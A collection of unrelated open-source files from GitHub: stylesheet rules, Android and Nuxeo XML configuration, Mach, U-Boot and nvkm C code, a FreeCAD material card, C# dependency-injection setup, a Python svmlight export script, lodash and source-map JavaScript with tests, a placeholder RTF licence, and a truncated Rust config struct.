vertical-align: middle;
margin: 0;
padding: 0;
width: 18px;
height: 18px;
background: url(orange.png) no-repeat;
border: none;
cursor: pointer;
}
.icheckbox_minimal-orange {
background-position: 0 0;
}
.icheckbox_minimal-orange.hover {
background-position: -20px 0;
}
.icheckbox_minimal-orange.checked {
background-position: -40px 0;
}
.icheckbox_minimal-orange.disabled {
background-position: -60px 0;
cursor: default;
}
.icheckbox_minimal-orange.checked.disabled {
background-position: -80px 0;
}
.iradio_minimal-orange {
background-position: -100px 0;
}
.iradio_minimal-orange.hover {
background-position: -120px 0;
}
.iradio_minimal-orange.checked {
background-position: -140px 0;
}
.iradio_minimal-orange.disabled {
background-position: -160px 0;
cursor: default;
}
.iradio_minimal-orange.checked.disabled {
background-position: -180px 0;
}
/* HiDPI support */
@media (-o-min-device-pixel-ratio: 5/4), (-webkit-min-device-pixel-ratio: 1.25), (min-resolution: 120dpi) {
.icheckbox_minimal-orange,
.iradio_minimal-orange {
background-image: url([email protected]);
-webkit-background-size: 200px 20px;
background-size: 200px 20px;
}
} | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!-- Copyright (C) 2013 The Android Open Source Project
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<translate xmlns:android="http://schemas.android.com/apk/res/android"
android:interpolator="@android:anim/decelerate_interpolator"
android:fromYDelta="50%p" android:toYDelta="0"
android:duration="@android:integer/config_mediumAnimTime"/>
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 1999-2010 Apple Inc. All rights reserved.
*
* @APPLE_OSREFERENCE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. The rights granted to you under the License
* may not be used to create, or enable the creation or redistribution of,
* unlawful or unlicensed copies of an Apple operating system, or to
* circumvent, violate, or enable the circumvention or violation of, any
* terms of an Apple operating system software license agreement.
*
* Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_OSREFERENCE_LICENSE_HEADER_END@
*/
/*
* Mach Operating System
* Copyright (c) 1991,1990,1989 Carnegie Mellon University
* All Rights Reserved.
*
* Permission to use, copy, modify and distribute this software and its
* documentation is hereby granted, provided that both the copyright
* notice and this permission notice appear in all copies of the
* software, derivative works or modified versions, and any portions
* thereof, and that both notices appear in supporting documentation.
*
* CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS"
* CONDITION. CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR
* ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE.
*
* Carnegie Mellon requests users of this software to return to
*
* Software Distribution Coordinator or [email protected]
* School of Computer Science
* Carnegie Mellon University
* Pittsburgh PA 15213-3890
*
* any improvements or extensions that they make and grant Carnegie Mellon
* the rights to redistribute these changes.
*/
/*
* File: mach_error.c
* Author: Douglas Orr, Carnegie Mellon University
* Date: Mar 1988
*
* interprets structured mach error codes and prints
* or returns a descriptive string.
*/
#include <mach/mach_error.h>
#include <mach/boolean.h>
#include "errorlib.h"
#include "string.h"
int fprintf_stderr(const char *format, ...);
void
mach_error(const char *str, mach_error_t err)
{
char *err_str;
char buf[1024];
boolean_t diag;
err_str = mach_error_string_int(err, &diag);
if (diag) {
_mach_snprintf(buf, sizeof(buf), "%s %s (%x)", mach_error_type(err), err_str, err);
err_str = buf;
}
fprintf_stderr("%s %s\n", str, err_str);
}
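/*
 * Illustrative usage (editorial sketch, not part of the original file;
 * pid and task are assumed to be declared by the caller):
 *
 *   kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
 *   if (kr != KERN_SUCCESS)
 *       mach_error("task_for_pid failed:", kr);
 *
 * prints the given prefix followed by the decoded error text, e.g.
 * "task_for_pid failed: (os/kern) failure".
 */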
| {
"pile_set_name": "Github"
} |
; Steel-17CrNiMo6
; (c) 2014 M. Münch - GNU Lesser General Public License (LGPL)
; information about the content of such cards can be found on the wiki:
; https://www.freecadweb.org/wiki/Material
; file created by FreeCAD0.18.16022 (Git)
[General]
Name = 17CrNiMo6
NameDE = 17CrNiMo6
DescriptionDE = höchste Beanspruchung, Wellen, Zahnräder
Father = Metal
KindOfMaterial = Case-hardened steel
KindOfMaterialDE = Einsatzstahl
MaterialNumber = 1.6587
Norm = EN 10084
[Mechanical]
Density = 7800 kg/m^3
PoissonRatio = 0.3
ShearModulus = 81000 MPa
UltimateStrain = 8
UltimateTensileStrength = 1150 MPa
YieldStrength = 830 MPa
YoungsModulus = 210000 MPa
[Thermal]
ThermalExpansionCoefficient = 0.000011 m/m/K
| {
"pile_set_name": "Github"
} |
// ------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License (MIT). See License.txt in the repo root for license information.
// ------------------------------------------------------------
namespace Microsoft.Azure.IIoT.Hub.Mock {
using Microsoft.Azure.IIoT.Hub.Client;
using Microsoft.Azure.IIoT.Hub.Services;
using Microsoft.Azure.IIoT.Serializers;
using Microsoft.Azure.IIoT.Module.Default;
using Autofac;
/// <summary>
/// Injected mock framework module
/// </summary>
public sealed class IoTHubMockService : Module {
/// <summary>
/// Load the module
/// </summary>
/// <param name="builder"></param>
protected override void Load(ContainerBuilder builder) {
// IoT hub and storage simulation
builder.RegisterType<IoTHubServices>()
.AsImplementedInterfaces().InstancePerLifetimeScope();
// Adapters
builder.RegisterType<IoTHubDeviceEventHandler>()
.AsImplementedInterfaces().InstancePerLifetimeScope();
builder.RegisterType<IoTHubTwinMethodClient>()
.AsImplementedInterfaces();
builder.RegisterType<ChunkMethodClient>()
.AsImplementedInterfaces();
// Register default serializers...
builder.RegisterModule<NewtonSoftJsonModule>();
base.Load(builder);
}
}
}
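// Illustrative usage (hypothetical composition root, not part of this file):
//
//   var builder = new ContainerBuilder();
//   builder.RegisterModule<IoTHubMockService>();
//   using (var container = builder.Build()) {
//       // resolve the registered twin/event-handler services, now backed by
//       // the in-memory IoT Hub simulation instead of a live hub
//   }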
| {
"pile_set_name": "Github"
} |
/* -*- Mode: js; js-indent-level: 2; -*- */
/*
* Copyright 2011 Mozilla Foundation and contributors
* Licensed under the New BSD license. See LICENSE or:
* http://opensource.org/licenses/BSD-3-Clause
*/
if (typeof define !== 'function') {
var define = require('amdefine')(module, require);
}
define(function (require, exports, module) {
var SourceMapConsumer = require('../../lib/source-map/source-map-consumer').SourceMapConsumer;
var SourceMapGenerator = require('../../lib/source-map/source-map-generator').SourceMapGenerator;
  exports['test that we can instantiate with a string or an object'] = function (assert, util) {
assert.doesNotThrow(function () {
var map = new SourceMapConsumer(util.testMap);
});
assert.doesNotThrow(function () {
var map = new SourceMapConsumer(JSON.stringify(util.testMap));
});
};
exports['test that the `sources` field has the original sources'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
var sources = map.sources;
assert.equal(sources[0], '/the/root/one.js');
assert.equal(sources[1], '/the/root/two.js');
assert.equal(sources.length, 2);
};
exports['test that the source root is reflected in a mapping\'s source field'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
var mapping;
mapping = map.originalPositionFor({
line: 2,
column: 1
});
assert.equal(mapping.source, '/the/root/two.js');
mapping = map.originalPositionFor({
line: 1,
column: 1
});
assert.equal(mapping.source, '/the/root/one.js');
};
exports['test mapping tokens back exactly'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
util.assertMapping(1, 1, '/the/root/one.js', 1, 1, null, map, assert);
util.assertMapping(1, 5, '/the/root/one.js', 1, 5, null, map, assert);
util.assertMapping(1, 9, '/the/root/one.js', 1, 11, null, map, assert);
util.assertMapping(1, 18, '/the/root/one.js', 1, 21, 'bar', map, assert);
util.assertMapping(1, 21, '/the/root/one.js', 2, 3, null, map, assert);
util.assertMapping(1, 28, '/the/root/one.js', 2, 10, 'baz', map, assert);
util.assertMapping(1, 32, '/the/root/one.js', 2, 14, 'bar', map, assert);
util.assertMapping(2, 1, '/the/root/two.js', 1, 1, null, map, assert);
util.assertMapping(2, 5, '/the/root/two.js', 1, 5, null, map, assert);
util.assertMapping(2, 9, '/the/root/two.js', 1, 11, null, map, assert);
util.assertMapping(2, 18, '/the/root/two.js', 1, 21, 'n', map, assert);
util.assertMapping(2, 21, '/the/root/two.js', 2, 3, null, map, assert);
util.assertMapping(2, 28, '/the/root/two.js', 2, 10, 'n', map, assert);
};
exports['test mapping tokens fuzzy'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
// Finding original positions
util.assertMapping(1, 20, '/the/root/one.js', 1, 21, 'bar', map, assert, true);
util.assertMapping(1, 30, '/the/root/one.js', 2, 10, 'baz', map, assert, true);
util.assertMapping(2, 12, '/the/root/two.js', 1, 11, null, map, assert, true);
// Finding generated positions
util.assertMapping(1, 18, '/the/root/one.js', 1, 22, 'bar', map, assert, null, true);
util.assertMapping(1, 28, '/the/root/one.js', 2, 13, 'baz', map, assert, null, true);
util.assertMapping(2, 9, '/the/root/two.js', 1, 16, null, map, assert, null, true);
};
exports['test creating source map consumers with )]}\' prefix'] = function (assert, util) {
assert.doesNotThrow(function () {
var map = new SourceMapConsumer(")]}'" + JSON.stringify(util.testMap));
});
};
exports['test eachMapping'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
var previousLine = -Infinity;
var previousColumn = -Infinity;
map.eachMapping(function (mapping) {
assert.ok(mapping.generatedLine >= previousLine);
if (mapping.source) {
assert.equal(mapping.source.indexOf(util.testMap.sourceRoot), 0);
}
if (mapping.generatedLine === previousLine) {
assert.ok(mapping.generatedColumn >= previousColumn);
previousColumn = mapping.generatedColumn;
}
else {
previousLine = mapping.generatedLine;
previousColumn = -Infinity;
}
});
};
exports['test iterating over mappings in a different order'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
var previousLine = -Infinity;
var previousColumn = -Infinity;
var previousSource = "";
map.eachMapping(function (mapping) {
assert.ok(mapping.source >= previousSource);
if (mapping.source === previousSource) {
assert.ok(mapping.originalLine >= previousLine);
if (mapping.originalLine === previousLine) {
assert.ok(mapping.originalColumn >= previousColumn);
previousColumn = mapping.originalColumn;
}
else {
previousLine = mapping.originalLine;
previousColumn = -Infinity;
}
}
else {
previousSource = mapping.source;
previousLine = -Infinity;
previousColumn = -Infinity;
}
}, null, SourceMapConsumer.ORIGINAL_ORDER);
};
exports['test that we can set the context for `this` in eachMapping'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
var context = {};
map.eachMapping(function () {
assert.equal(this, context);
}, context);
};
exports['test that the `sourcesContent` field has the original sources'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMapWithSourcesContent);
var sourcesContent = map.sourcesContent;
assert.equal(sourcesContent[0], ' ONE.foo = function (bar) {\n return baz(bar);\n };');
assert.equal(sourcesContent[1], ' TWO.inc = function (n) {\n return n + 1;\n };');
assert.equal(sourcesContent.length, 2);
};
exports['test that we can get the original sources for the sources'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMapWithSourcesContent);
var sources = map.sources;
assert.equal(map.sourceContentFor(sources[0]), ' ONE.foo = function (bar) {\n return baz(bar);\n };');
assert.equal(map.sourceContentFor(sources[1]), ' TWO.inc = function (n) {\n return n + 1;\n };');
assert.equal(map.sourceContentFor("one.js"), ' ONE.foo = function (bar) {\n return baz(bar);\n };');
assert.equal(map.sourceContentFor("two.js"), ' TWO.inc = function (n) {\n return n + 1;\n };');
assert.throws(function () {
map.sourceContentFor("");
}, Error);
assert.throws(function () {
map.sourceContentFor("/the/root/three.js");
}, Error);
assert.throws(function () {
map.sourceContentFor("three.js");
}, Error);
};
exports['test sourceRoot + generatedPositionFor'] = function (assert, util) {
var map = new SourceMapGenerator({
sourceRoot: 'foo/bar',
file: 'baz.js'
});
map.addMapping({
original: { line: 1, column: 1 },
generated: { line: 2, column: 2 },
source: 'bang.coffee'
});
map.addMapping({
original: { line: 5, column: 5 },
generated: { line: 6, column: 6 },
source: 'bang.coffee'
});
map = new SourceMapConsumer(map.toString());
// Should handle without sourceRoot.
var pos = map.generatedPositionFor({
line: 1,
column: 1,
source: 'bang.coffee'
});
assert.equal(pos.line, 2);
assert.equal(pos.column, 2);
// Should handle with sourceRoot.
var pos = map.generatedPositionFor({
line: 1,
column: 1,
source: 'foo/bar/bang.coffee'
});
assert.equal(pos.line, 2);
assert.equal(pos.column, 2);
};
exports['test sourceRoot + originalPositionFor'] = function (assert, util) {
var map = new SourceMapGenerator({
sourceRoot: 'foo/bar',
file: 'baz.js'
});
map.addMapping({
original: { line: 1, column: 1 },
generated: { line: 2, column: 2 },
source: 'bang.coffee'
});
map = new SourceMapConsumer(map.toString());
var pos = map.originalPositionFor({
line: 2,
column: 2,
});
// Should always have the prepended source root
assert.equal(pos.source, 'foo/bar/bang.coffee');
assert.equal(pos.line, 1);
assert.equal(pos.column, 1);
};
exports['test github issue #56'] = function (assert, util) {
var map = new SourceMapGenerator({
sourceRoot: 'http://',
file: 'www.example.com/foo.js'
});
map.addMapping({
original: { line: 1, column: 1 },
generated: { line: 2, column: 2 },
source: 'www.example.com/original.js'
});
map = new SourceMapConsumer(map.toString());
var sources = map.sources;
assert.equal(sources.length, 1);
assert.equal(sources[0], 'http://www.example.com/original.js');
};
exports['test github issue #43'] = function (assert, util) {
var map = new SourceMapGenerator({
sourceRoot: 'http://example.com',
file: 'foo.js'
});
map.addMapping({
original: { line: 1, column: 1 },
generated: { line: 2, column: 2 },
source: 'http://cdn.example.com/original.js'
});
map = new SourceMapConsumer(map.toString());
var sources = map.sources;
assert.equal(sources.length, 1,
'Should only be one source.');
assert.equal(sources[0], 'http://cdn.example.com/original.js',
'Should not be joined with the sourceRoot.');
};
exports['test absolute path, but same host sources'] = function (assert, util) {
var map = new SourceMapGenerator({
sourceRoot: 'http://example.com/foo/bar',
file: 'foo.js'
});
map.addMapping({
original: { line: 1, column: 1 },
generated: { line: 2, column: 2 },
source: '/original.js'
});
map = new SourceMapConsumer(map.toString());
var sources = map.sources;
assert.equal(sources.length, 1,
'Should only be one source.');
assert.equal(sources[0], 'http://example.com/original.js',
'Source should be relative the host of the source root.');
};
exports['test github issue #64'] = function (assert, util) {
var map = new SourceMapConsumer({
"version": 3,
"file": "foo.js",
"sourceRoot": "http://example.com/",
"sources": ["/a"],
"names": [],
"mappings": "AACA",
"sourcesContent": ["foo"]
});
assert.equal(map.sourceContentFor("a"), "foo");
assert.equal(map.sourceContentFor("/a"), "foo");
};
exports['test bug 885597'] = function (assert, util) {
var map = new SourceMapConsumer({
"version": 3,
"file": "foo.js",
"sourceRoot": "file:///Users/AlGore/Invented/The/Internet/",
"sources": ["/a"],
"names": [],
"mappings": "AACA",
"sourcesContent": ["foo"]
});
var s = map.sources[0];
assert.equal(map.sourceContentFor(s), "foo");
};
exports['test github issue #72, duplicate sources'] = function (assert, util) {
var map = new SourceMapConsumer({
"version": 3,
"file": "foo.js",
"sources": ["source1.js", "source1.js", "source3.js"],
"names": [],
"mappings": ";EAAC;;IAEE;;MEEE",
"sourceRoot": "http://example.com"
});
var pos = map.originalPositionFor({
line: 2,
column: 2
});
assert.equal(pos.source, 'http://example.com/source1.js');
assert.equal(pos.line, 1);
assert.equal(pos.column, 1);
var pos = map.originalPositionFor({
line: 4,
column: 4
});
assert.equal(pos.source, 'http://example.com/source1.js');
assert.equal(pos.line, 3);
assert.equal(pos.column, 3);
var pos = map.originalPositionFor({
line: 6,
column: 6
});
assert.equal(pos.source, 'http://example.com/source3.js');
assert.equal(pos.line, 5);
assert.equal(pos.column, 5);
};
exports['test github issue #72, duplicate names'] = function (assert, util) {
var map = new SourceMapConsumer({
"version": 3,
"file": "foo.js",
"sources": ["source.js"],
"names": ["name1", "name1", "name3"],
"mappings": ";EAACA;;IAEEA;;MAEEE",
"sourceRoot": "http://example.com"
});
var pos = map.originalPositionFor({
line: 2,
column: 2
});
assert.equal(pos.name, 'name1');
assert.equal(pos.line, 1);
assert.equal(pos.column, 1);
var pos = map.originalPositionFor({
line: 4,
column: 4
});
assert.equal(pos.name, 'name1');
assert.equal(pos.line, 3);
assert.equal(pos.column, 3);
var pos = map.originalPositionFor({
line: 6,
column: 6
});
assert.equal(pos.name, 'name3');
assert.equal(pos.line, 5);
assert.equal(pos.column, 5);
};
exports['test SourceMapConsumer.fromSourceMap'] = function (assert, util) {
var smg = new SourceMapGenerator({
sourceRoot: 'http://example.com/',
file: 'foo.js'
});
smg.addMapping({
original: { line: 1, column: 1 },
generated: { line: 2, column: 2 },
source: 'bar.js'
});
smg.addMapping({
original: { line: 2, column: 2 },
generated: { line: 4, column: 4 },
source: 'baz.js',
name: 'dirtMcGirt'
});
smg.setSourceContent('baz.js', 'baz.js content');
var smc = SourceMapConsumer.fromSourceMap(smg);
assert.equal(smc.file, 'foo.js');
assert.equal(smc.sourceRoot, 'http://example.com/');
assert.equal(smc.sources.length, 2);
assert.equal(smc.sources[0], 'http://example.com/bar.js');
assert.equal(smc.sources[1], 'http://example.com/baz.js');
assert.equal(smc.sourceContentFor('baz.js'), 'baz.js content');
var pos = smc.originalPositionFor({
line: 2,
column: 2
});
assert.equal(pos.line, 1);
assert.equal(pos.column, 1);
assert.equal(pos.source, 'http://example.com/bar.js');
assert.equal(pos.name, null);
pos = smc.generatedPositionFor({
line: 1,
column: 1,
source: 'http://example.com/bar.js'
});
assert.equal(pos.line, 2);
assert.equal(pos.column, 2);
pos = smc.originalPositionFor({
line: 4,
column: 4
});
assert.equal(pos.line, 2);
assert.equal(pos.column, 2);
assert.equal(pos.source, 'http://example.com/baz.js');
assert.equal(pos.name, 'dirtMcGirt');
pos = smc.generatedPositionFor({
line: 2,
column: 2,
source: 'http://example.com/baz.js'
});
assert.equal(pos.line, 4);
assert.equal(pos.column, 4);
};
});
| {
"pile_set_name": "Github"
} |
#ifndef __NVKM_MEM_H__
#define __NVKM_MEM_H__
#include "priv.h"
int nvkm_mem_new_type(struct nvkm_mmu *, int type, u8 page, u64 size,
void *argv, u32 argc, struct nvkm_memory **);
int nvkm_mem_map_host(struct nvkm_memory *, void **pmap);
int nv04_mem_new(struct nvkm_mmu *, int, u8, u64, void *, u32,
struct nvkm_memory **);
int nv04_mem_map(struct nvkm_mmu *, struct nvkm_memory *, void *, u32,
u64 *, u64 *, struct nvkm_vma **);
int nv50_mem_new(struct nvkm_mmu *, int, u8, u64, void *, u32,
struct nvkm_memory **);
int nv50_mem_map(struct nvkm_mmu *, struct nvkm_memory *, void *, u32,
u64 *, u64 *, struct nvkm_vma **);
int gf100_mem_new(struct nvkm_mmu *, int, u8, u64, void *, u32,
struct nvkm_memory **);
int gf100_mem_map(struct nvkm_mmu *, struct nvkm_memory *, void *, u32,
u64 *, u64 *, struct nvkm_vma **);
#endif
| {
"pile_set_name": "Github"
} |
import pandas as pd
import numpy as np
from sklearn.datasets import dump_svmlight_file
df1 = pd.read_csv("./dataset/input_label.csv")
df2 = pd.read_csv("./dataset/input.csv")
res = pd.merge(df1, df2, how='left', left_on='id', right_on='id')
X = res[np.setdiff1d(res.columns,['label','id'])]
y = res.label
dump_svmlight_file(X,y,'/host/smvlight.dat',zero_based=True,multilabel=False)
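# Note (editorial): dump_svmlight_file writes rows in the svmlight/libsvm text
# format, i.e. "<label> <index>:<value> <index>:<value> ...", with feature
# indices starting at 0 because zero_based=True is passed above.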
| {
"pile_set_name": "Github"
} |
var baseCreate = require('./_baseCreate'),
isObject = require('./isObject');
/**
* Creates a function that produces an instance of `Ctor` regardless of
* whether it was invoked as part of a `new` expression or by `call` or `apply`.
*
* @private
* @param {Function} Ctor The constructor to wrap.
* @returns {Function} Returns the new wrapped function.
*/
function createCtor(Ctor) {
return function() {
// Use a `switch` statement to work with class constructors. See
// http://ecma-international.org/ecma-262/7.0/#sec-ecmascript-function-objects-call-thisargument-argumentslist
// for more details.
var args = arguments;
switch (args.length) {
case 0: return new Ctor;
case 1: return new Ctor(args[0]);
case 2: return new Ctor(args[0], args[1]);
case 3: return new Ctor(args[0], args[1], args[2]);
case 4: return new Ctor(args[0], args[1], args[2], args[3]);
case 5: return new Ctor(args[0], args[1], args[2], args[3], args[4]);
case 6: return new Ctor(args[0], args[1], args[2], args[3], args[4], args[5]);
case 7: return new Ctor(args[0], args[1], args[2], args[3], args[4], args[5], args[6]);
}
var thisBinding = baseCreate(Ctor.prototype),
result = Ctor.apply(thisBinding, args);
// Mimic the constructor's `return` behavior.
// See https://es5.github.io/#x13.2.2 for more details.
return isObject(result) ? result : thisBinding;
};
}
module.exports = createCtor;
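// Illustrative usage (hypothetical constructor, not part of lodash itself):
//
//   function Point(x, y) { this.x = x; this.y = y; }
//   var makePoint = createCtor(Point);
//   var p = makePoint(1, 2); // equivalent to `new Point(1, 2)`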
| {
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<component name="org.nuxeo.ecm.directories">
<!-- template definitions for vocabularies -->
<extension target="org.nuxeo.ecm.directory.GenericDirectory" point="directories">
<directory name="template-vocabulary" template="true" extends="template-directory">
<schema>vocabulary</schema>
<idField>id</idField>
</directory>
<directory name="template-xvocabulary" template="true" extends="template-directory">
<schema>xvocabulary</schema>
<idField>id</idField>
</directory>
<directory name="template-l10nxvocabulary" template="true" extends="template-directory">
<schema>l10nxvocabulary</schema>
<idField>id</idField>
</directory>
<directory name="template-documentsLists" template="true" extends="template-directory">
<schema>documentsLists</schema>
<idField>id</idField>
</directory>
</extension>
<!-- vocabulary definitions -->
<extension target="org.nuxeo.ecm.directory.GenericDirectory" point="directories">
<directory name="country" extends="template-xvocabulary">
<parentDirectory>continent</parentDirectory>
<dataFile>directories/country.csv</dataFile>
</directory>
<directory name="continent" extends="template-vocabulary">
<deleteConstraint
class="org.nuxeo.ecm.directory.HierarchicalDirectoryDeleteConstraint">
<property name="targetDirectory">country</property>
<property name="targetDirectoryField">parent</property>
</deleteConstraint>
<dataFile>directories/continent.csv</dataFile>
</directory>
<directory name="l10ncoverage" extends="template-l10nxvocabulary">
<parentDirectory>l10ncoverage</parentDirectory>
<deleteConstraint
class="org.nuxeo.ecm.directory.HierarchicalDirectoryDeleteConstraint">
<property name="targetDirectory">l10ncoverage</property>
<property name="targetDirectoryField">parent</property>
</deleteConstraint>
<dataFile>directories/l10ncoverage.csv</dataFile>
</directory>
<directory name="subtopic" extends="template-xvocabulary">
<parentDirectory>topic</parentDirectory>
<dataFile>directories/subtopic.csv</dataFile>
</directory>
<directory name="topic" extends="template-vocabulary">
<deleteConstraint
class="org.nuxeo.ecm.directory.HierarchicalDirectoryDeleteConstraint">
<property name="targetDirectory">subtopic</property>
<property name="targetDirectoryField">parent</property>
</deleteConstraint>
<dataFile>directories/topic.csv</dataFile>
</directory>
<directory name="l10nsubjects" extends="template-l10nxvocabulary">
<parentDirectory>l10nsubjects</parentDirectory>
<deleteConstraint
class="org.nuxeo.ecm.directory.HierarchicalDirectoryDeleteConstraint">
<property name="targetDirectory">l10nsubjects</property>
<property name="targetDirectoryField">parent</property>
</deleteConstraint>
<dataFile>directories/l10nsubjects.csv</dataFile>
</directory>
<directory name="subject" extends="template-vocabulary">
<types>
<type>system</type>
</types>
<dataFile>directories/subject.csv</dataFile>
</directory>
<directory name="search_operators" extends="template-vocabulary">
<types>
<type>system</type>
</types>
<dataFile>directories/search_operators.csv</dataFile>
</directory>
<directory name="documentsLists" extends="template-documentsLists">
<types>
<type>system</type>
</types>
<permissions>
<permission name="Write">
<group>Everyone</group>
</permission>
</permissions>
</directory>
<directory name="language" extends="template-vocabulary">
<dataFile>directories/language.csv</dataFile>
</directory>
<directory name="nature" extends="template-vocabulary">
<dataFile>directories/nature.csv</dataFile>
</directory>
</extension>
</component>
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2004-2006 Atmel Corporation
*
* See file CREDITS for list of people who contributed to this
* project.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as
* published by the Free Software Foundation; either version 2 of
* the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston,
* MA 02111-1307 USA
*/
#include <common.h>
#include <div64.h>
#include <asm/errno.h>
#include <asm/io.h>
#include <asm/processor.h>
#include <asm/sysreg.h>
#include <asm/arch/hardware.h>
#define HANDLER_MASK 0x00ffffff
#define INTLEV_SHIFT 30
#define INTLEV_MASK 0x00000003
DECLARE_GLOBAL_DATA_PTR;
/* Incremented whenever COUNT reaches 0xffffffff by timer_interrupt_handler */
volatile unsigned long timer_overflow;
/*
* Instead of dividing by get_tbclk(), multiply by this constant and
* right-shift the result by 32 bits.
*/
static unsigned long tb_factor;
unsigned long get_tbclk(void)
{
return gd->cpu_hz;
}
unsigned long long get_ticks(void)
{
unsigned long lo, hi_now, hi_prev;
do {
hi_prev = timer_overflow;
lo = sysreg_read(COUNT);
hi_now = timer_overflow;
} while (hi_prev != hi_now);
return ((unsigned long long)hi_now << 32) | lo;
}
unsigned long get_timer(unsigned long base)
{
u64 now = get_ticks();
now *= tb_factor;
return (unsigned long)(now >> 32) - base;
}
/*
* For short delays only. It will overflow after a few seconds.
*/
void __udelay(unsigned long usec)
{
unsigned long cycles;
unsigned long base;
unsigned long now;
base = sysreg_read(COUNT);
cycles = ((usec * (get_tbclk() / 10000)) + 50) / 100;
do {
now = sysreg_read(COUNT);
} while ((now - base) < cycles);
}
static int set_interrupt_handler(unsigned int nr, void (*handler)(void),
unsigned int priority)
{
extern void _evba(void);
unsigned long intpr;
unsigned long handler_addr = (unsigned long)handler;
handler_addr -= (unsigned long)&_evba;
if ((handler_addr & HANDLER_MASK) != handler_addr
|| (priority & INTLEV_MASK) != priority)
return -EINVAL;
intpr = (handler_addr & HANDLER_MASK);
intpr |= (priority & INTLEV_MASK) << INTLEV_SHIFT;
writel(intpr, (void *)ATMEL_BASE_INTC + 4 * nr);
return 0;
}
int timer_init(void)
{
extern void timer_interrupt_handler(void);
u64 tmp;
sysreg_write(COUNT, 0);
tmp = (u64)CONFIG_SYS_HZ << 32;
tmp += gd->cpu_hz / 2;
do_div(tmp, gd->cpu_hz);
tb_factor = (u32)tmp;
if (set_interrupt_handler(0, &timer_interrupt_handler, 3))
return -EINVAL;
/* For all practical purposes, this gives us an overflow interrupt */
sysreg_write(COMPARE, 0xffffffff);
return 0;
}
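/*
 * Worked example (editorial note, illustrative numbers): with gd->cpu_hz at
 * 66 MHz and CONFIG_SYS_HZ at 1000, timer_init() computes
 * tb_factor = (1000 << 32) / 66000000, roughly 65075, so get_timer() converts
 * raw COUNT ticks to milliseconds as (ticks * tb_factor) >> 32, which is
 * approximately ticks * 1000 / 66000000.
 */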
| {
"pile_set_name": "Github"
} |
{\rtf1\ansi\ansicpg1252\cocoartf1504\cocoasubrtf830
\cocoascreenfonts1{\fonttbl\f0\fswiss\fcharset0 ArialMT;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\paperw11900\paperh16840\margl1440\margr1440\vieww17060\viewh12300\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0
\f0\b\fs20 \cf0 THIS IS A PLACEHOLDER LICENCE PROVIDED WITH IPLUG2 WITH NO LEGAL BASIS\
CONSULT A LAWYER BEFORE MAKING A LICENCE\
\
Caveat:
\b0 \
By installing this software you agree to use it at your own risk. The developer cannot be held responsible for any damages caused as a result of its use.\
\
\b Distribution:
\b0 \
You are not permitted to distribute the software without the developer's permission. This includes, but is not limited to the distribution on magazine covers or software review websites.\
\
\b Multiple Installations*:
\b0 If you purchased this product as an individual, you are licensed to install and use the software on any computer you need to use it on, providing you remove it afterwards (if it is a shared machine). If you purchased it as an institution or company, you are licensed to use it on one machine only, and must purchase additional copies for each machine you wish to use it on.\
\
\b Upgrades*:
\b0 If you purchased this product you are entitled to free updates until the next major version number. The developer makes no guarantee that this product will be maintained indefinitely.\
\
\b License transfers*:
\b0 If you purchased this product you may transfer your license to another person. As the original owner you are required to contact the developer with the details of the license transfer, so that the new owner can receive the updates and support attached to the license. Upon transferring a license, the original owner must remove any copies from their machines and is no longer permitted to use the software.\
\
\b IPlugInstrument is \'a9 Copyright THE DEVELOPER 2004-2011\
\b0 \
http://www.thedeveloperswebsite.com\
\
VST and VST3 are trademarks of Steinberg Media Technologies GmbH. \
Audio Unit is a trademark of Apple, Inc. \
AAX is a trademarks of Avid, Inc.\
\
* Applies to full version only, not the demo version.} | {
"pile_set_name": "Github"
} |
//! This module is responsible for defining the external config format and parsing it.
use {
crate::{galaxygen, Particle},
serde::Deserialize,
};
#[derive(Deserialize, Clone, Debug)]
/// The configuration that specifies the initial values of the simulation.
pub struct Config {
pub camera_pos: [f32; 3],
